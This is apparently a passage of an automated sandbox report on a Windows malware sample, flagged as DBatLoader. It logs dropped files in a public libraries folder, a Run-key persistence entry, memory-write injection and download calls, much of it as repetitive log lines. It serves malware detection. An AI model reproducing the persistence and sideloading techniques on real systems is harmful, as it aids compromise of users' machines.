                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeWindow found: window name: SysTabControl32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\colorcpl.exeWindow detected: Number of UI elements: 12
                  Source: XY2I8rWLkM.exeStatic file information: File size 2200064 > 1048576
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013B67000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr
                  Source: Binary string: easinvoker.pdbH source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013B67000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2037895391.0000000014C50000.00000004.00000020.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr

                  Data Obfuscation

                  barindex
                  Yara detected DBatLoader
                  Source: Yara matchFile source: 0.2.XY2I8rWLkM.exe.28a0000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.XY2I8rWLkM.exe.228a9b8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.XY2I8rWLkM.exe.228a9b8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2154857966.0000000002AE1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2212258273.00000000029B1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2027190578.000000000228A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2051616049.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B7AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_028B7AC0
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .
                  Source: netutils.dll.0.drStatic PE information: real checksum: 0x2c00d should be: 0x1f08e
                  Source: XY2I8rWLkM.exeStatic PE information: real checksum: 0x0 should be: 0x224133
                  Source: Ocihlomc.PIF.4.drStatic PE information: real checksum: 0x0 should be: 0x224133
                  Source: easinvoker.exe.0.drStatic PE information: section name: .imrsiv
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: .
                  Source: netutils.dll.0.drStatic PE information: section name: /4
                  Source: netutils.dll.0.drStatic PE information: section name: /19
                  Source: netutils.dll.0.drStatic PE information: section name: /31
                  Source: netutils.dll.0.drStatic PE information: section name: /45
                  Source: netutils.dll.0.drStatic PE information: section name: /57
                  Source: netutils.dll.0.drStatic PE information: section name: /70
                  Source: netutils.dll.0.drStatic PE information: section name: /81
                  Source: netutils.dll.0.drStatic PE information: section name: /92
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028CA2F4 push 028CA35Fh; ret 0_2_028CA357
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028A32F0 push eax; ret 0_2_028A332C
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028BD20C push ecx; mov dword ptr [esp], edx0_2_028BD211
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028A6372 push 028A63CFh; ret 0_2_028A63C7
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028A6374 push 028A63CFh; ret 0_2_028A63C7
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028CA0AC push 028CA125h; ret 0_2_028CA11D
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B3028 push 028B3075h; ret 0_2_028B306D
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B3027 push 028B3075h; ret 0_2_028B306D
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028CA1F8 push 028CA288h; ret 0_2_028CA280
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028CA144 push 028CA1ECh; ret 0_2_028CA1E4
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028A673E push 028A6782h; ret 0_2_028A677A
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028A6740 push 028A6782h; ret 0_2_028A677A
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028AC528 push ecx; mov dword ptr [esp], edx0_2_028AC52D
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028AD55C push 028AD588h; ret 0_2_028AD580
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028ACBA8 push 028ACD2Eh; ret 0_2_028ACD26
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B9B58 push 028B9B90h; ret 0_2_028B9B88
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028C9B58 push 028C9D76h; ret 0_2_028C9D6E
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B78C8 push 028B7945h; ret 0_2_028B793D
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028AC8D6 push 028ACD2Eh; ret 0_2_028ACD26
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B6902 push 028B69AFh; ret 0_2_028B69A7
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B6904 push 028B69AFh; ret 0_2_028B69A7
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B5E38 push ecx; mov dword ptr [esp], edx0_2_028B5E3A
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028CDF18 push eax; ret 0_2_028CDFE8
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B2F1C push 028B2F92h; ret 0_2_028B2F8A
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B7CA8 push 028B7CE0h; ret 0_2_028B7CD8
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B7CA6 push 028B7CE0h; ret 0_2_028B7CD8
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046BE54D push esi; ret 5_2_046BE556
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046BB0F2 push esp; ret 5_2_046BB141
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046BB142 pushad ; ret 5_2_046BB151
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046B7106 push ecx; ret 5_2_046B7119
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04694E56 push ecx; ret 5_2_04694E69

                  Persistence and Installation Behavior

                  barindex
                  Drops PE files with a suspicious file extension
                  Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\Libraries\Ocihlomc.PIFJump to dropped file
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04666EB0 ShellExecuteW,URLDownloadToFileW,5_2_04666EB0
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeFile created: C:\Users\Public\Libraries\easinvoker.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\Libraries\Ocihlomc.PIFJump to dropped file
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeFile created: C:\Users\Public\Libraries\netutils.dllJump to dropped file
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0467AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_0467AA4A
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OcihlomcJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OcihlomcJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B9B94 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_028B9B94
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
